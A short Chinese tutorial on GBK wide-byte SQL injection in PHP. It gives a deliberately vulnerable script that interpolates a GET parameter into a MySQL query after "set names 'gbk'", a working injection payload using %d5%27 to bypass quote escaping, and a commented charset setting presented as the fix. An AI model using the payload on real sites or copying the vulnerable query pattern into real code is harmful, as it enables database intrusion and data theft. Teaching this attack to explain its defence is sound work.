利用GBK双字节编码突破PHP单引号转义限制进行SQL注入：set names gbk导致的sql注入

<?php

$conn = mysql_connect('localhost','root','')or die("<font color=red>不能连接数据库！</font>");

$db = mysql_select_db('test',$conn);

mysql_query("set names 'gbk'");//如果是这行，就可以注入了

//mysql_query("SET character_set_connection='gbk',character_set_results='gbk',character_set_client=binary");//换成这行，就可以防止注入了

$username = $_GET['username'];

$query = "select * from zp where class_id='27' and flag=0 and username='$username' order by id desc limit 1";

echo $query;

$result = mysql_query($query);

$row = mysql_fetch_array($result);

print_r($row);

?>

get变量：?username=test%d5%27%20or%20id=1%23 

------------------------------

参考来源：http://hi.baidu.com/cdcxdzj/blog/item/43a514f7017711c3f3d38515.html

http://hi.baidu.com/wbkys/item/b908c20b8014ec1ceafe380a